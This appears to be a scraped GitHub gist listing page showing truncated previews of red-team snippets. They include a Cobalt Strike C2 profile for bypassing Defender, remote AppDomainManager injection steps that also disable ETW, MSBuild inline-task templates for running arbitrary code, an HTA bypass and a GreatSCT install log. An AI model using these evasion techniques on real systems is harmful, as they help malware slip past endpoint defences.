@ConsciousHacker
ConsciousHacker / Deploy-EnforcedWDACScanPolicy.ps1
Created March 22, 2024 16:30 — forked from bohops/Deploy-EnforcedWDACScanPolicy.ps1
Restrictive (with caveats) WDAC Policy for research purposes
Write-Host "
==============================================================================================================================
*Deploy an Enforced 'Scan' Windows Defender Application Control (WDAC)/Device Guard Policy with Code Integrity (UMCI)
*Focus: Permit signed applications at the PCACertificate level (e.g. Microsoft signed).
*For Testing on Windows 10/11 Business/Enterprise - Downloads and merges the WDAC Bypass Rules with a scan policy
*System reboots when PowerShell script finishes
*Run as a privileged user in high integrity
*To remove enforcement, comment out enforce line
@ConsciousHacker
ConsciousHacker / minimal-defender-bypass.profile
Created January 2, 2022 21:20 — forked from tothi/minimal-defender-bypass.profile
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
@ConsciousHacker
ConsciousHacker / README.md
Created September 1, 2020 20:58 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to, say, C:\Test. Let's use aspnet_compiler.exe as an example.
  2. Compile test.cs to test.dll with a signed strong name; this is required to load an assembly from outside a .NET application's base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@ConsciousHacker
ConsciousHacker / honeybadger.hta
Created May 23, 2019 20:41
HoneyBadger PNG - .NET Assembly Bypass
<html>
<img id="HoneyBadger" src="
@ConsciousHacker
ConsciousHacker / poc.png
Created May 22, 2019 04:09
MSBuild - Property functions -
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@ConsciousHacker
ConsciousHacker / greatsct_install.txt
Created November 8, 2018 17:25
GreatSCT Install on Kali-2018.4
root@kali:/opt/GreatSCT/setup# ./setup.sh
==========================================================================
GreatSCT (Setup Script) | [Updated]: 2018-01-21
==========================================================================
[Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
==========================================================================
Debug: userhomedir = /root
Debug: rootdir = /opt/GreatSCT
Debug: trueuser = root
@ConsciousHacker
ConsciousHacker / COM-ScheduledTasks.ps1
Created October 19, 2018 17:20 — forked from thed06/COM-ScheduledTasks.ps1
Scheduled Tasks in PowerShell Version 2 via Schedule.Service COM Object
function Install-ScheduledTask {
<#
.SYNOPSIS
Install a scheduled task using Schedule.Service COM object.
.DESCRIPTION
This function installs a scheduled task using Schedule.Service COM object.
.PARAMETER TaskPath
String. The path of the task.
.PARAMETER TaskName
@ConsciousHacker
ConsciousHacker / pshell_template_embedded_script.xml
Created February 2, 2018 22:46 — forked from xorrior/pshell_template_embedded_script.xml
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@ConsciousHacker
ConsciousHacker / pshell_template_embedded_script.xml
Created February 2, 2018 22:46 — forked from jbarcia/pshell_template_embedded_script.xml
MSBuild Powershell Script XML template
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">